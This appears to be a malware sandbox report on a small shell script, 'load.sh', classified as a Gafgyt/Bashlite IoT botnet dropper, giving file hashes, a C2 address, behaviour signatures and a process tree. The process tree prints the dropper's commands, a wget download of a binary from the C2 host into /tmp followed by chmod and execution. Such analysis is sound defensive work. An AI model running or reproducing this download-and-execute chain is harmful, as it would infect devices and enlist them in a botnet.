Overview

overview

10

Static

static

1

load.sh

ubuntu-18.04-amd64

10

load.sh

debian-9-armhf

10

load.sh

debian-9-mips

10

load.sh

debian-9-mipsel

10

Resubmissions

02/03/2025, 00:51

250302-a7g2dsysds 7

02/03/2025, 00:49

250302-a6r5zaymw2 10

02/03/2025, 00:48

250302-a5tx6syms4 3

01/03/2025, 11:30

250301-nmf59azrs3 10

Analysis

  • max time kernel
    1s
  • max time network
    2s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    02/03/2025, 00:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    load.sh

  • Size

    129B

  • MD5

    b165b7f155810af7139dd707d2e151c9

  • SHA1

    a49fe736dd310d0a64f3628c744c590fd7c43bdc

  • SHA256

    d21adb4e0938c18241d225748676e9f73c5a81210be881841b3b22c6e6abe9b4

  • SHA512

    8256ac2815b643527aae2410fa26a4179c22b793d028b402b2077fd57031e48f2457f6a07a6a0f53e479a3781ac466f248e58114dd38e35793ac3364e07a177c

Score
10/10
gafgytbotnetdefense_evasion

Malware Config

Extracted

Family

gafgyt

C2

23.157.176.170:4258

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Gafgyt family
    gafgyt
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

    botnetgafgyt
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/load.sh
    /tmp/load.sh
    1⤵
    • Executes dropped EXE
    PID:639
    • /usr/bin/wget
      wget -q http://23.157.176.170/bin.x86_64 -O /tmp/bin.x86_64
      2⤵
      • Writes file to tmp directory
      PID:641
    • /bin/chmod
      chmod +x /tmp/bin.x86_64
      2⤵
      • File and Directory Permissions Modification
      PID:658
  • /tmp/bin.x86_64
    /tmp/bin.x86_64
    1⤵
      PID:660

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/bin.x86_64
      Filesize

      1.2MB

      MD5

      4a3c1c3b93e23346db61e05d48b6851b

      SHA1

      1aa8f6002d26188006fb6e2f844464d9cfcf225a

      SHA256

      d42209da7d4a2af37c7bb2e0bdeab6b30d7b1bfe4a0ef8e47cfba8140eb1ba34

      SHA512

      ae669cd0418ab4cdf00ac07ea3fd03b2ef9b6d37a3a201004bbdab0fdb33082024097e81e1cd245a6f3290b2b67c127e1316e59a24f6918211fd15c5d2c54add

      Download Submit